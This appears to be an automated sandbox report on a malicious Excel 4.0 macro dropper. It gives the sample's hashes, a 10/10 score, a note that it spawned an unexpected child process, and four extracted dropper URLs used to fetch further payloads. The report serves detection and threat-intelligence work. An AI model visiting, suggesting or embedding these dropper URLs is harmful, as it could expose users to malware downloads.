General

  • Target

    4f5ea57f17a6fbca2d4638dfa154f2e60e6609f83a1cf6f71466c9fd09d468e4

  • Size

    96KB

  • Sample

    241111-vt4y8a1nav

  • MD5

    66433ea9840b53a161cc063ea988fc9d

  • SHA1

    f2e16a2fc15620523fdbbd5cc72a9c0e52af035e

  • SHA256

    4f5ea57f17a6fbca2d4638dfa154f2e60e6609f83a1cf6f71466c9fd09d468e4

  • SHA512

    59368dcda3dfd6fb14f138fac99cc793d167fdc05d9c7634d8722d28f80ad78e74197c8d31c800cde51d3f9fbe9e572f5b1071090cc8f49e0585a4d11ca9e795

  • SSDEEP

    1536:7kKpb8rGYrMPe3q7Q0XV5xtezEsi8/dg2HuS4hcTO97v7UYdEJmY:IKpb8rGYrMPe3q7Q0XV5xtezEsi8/dgE

Score
10/10

Malware Config

Extracted

Language
xlm4.0
Source
URLs
xlm40.dropper

https://atperson.com/campusvirtual/EOgFGo17w/

xlm40.dropper

https://eliteturismo.com/phpmailer-old/dafdBxQONtk5Uf9dxll/

xlm40.dropper

http://atici.net/c/JDFDBMIz/

xlm40.dropper

http://domesticuif.co.za/libraries/nbnH9dpd/

Targets

    • Target

      4f5ea57f17a6fbca2d4638dfa154f2e60e6609f83a1cf6f71466c9fd09d468e4

    • Size

      96KB

    • MD5

      66433ea9840b53a161cc063ea988fc9d

    • SHA1

      f2e16a2fc15620523fdbbd5cc72a9c0e52af035e

    • SHA256

      4f5ea57f17a6fbca2d4638dfa154f2e60e6609f83a1cf6f71466c9fd09d468e4

    • SHA512

      59368dcda3dfd6fb14f138fac99cc793d167fdc05d9c7634d8722d28f80ad78e74197c8d31c800cde51d3f9fbe9e572f5b1071090cc8f49e0585a4d11ca9e795

    • SSDEEP

      1536:7kKpb8rGYrMPe3q7Q0XV5xtezEsi8/dg2HuS4hcTO97v7UYdEJmY:IKpb8rGYrMPe3q7Q0XV5xtezEsi8/dgE

    Score
    10/10
    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.

MITRE ATT&CK Enterprise v15

Tasks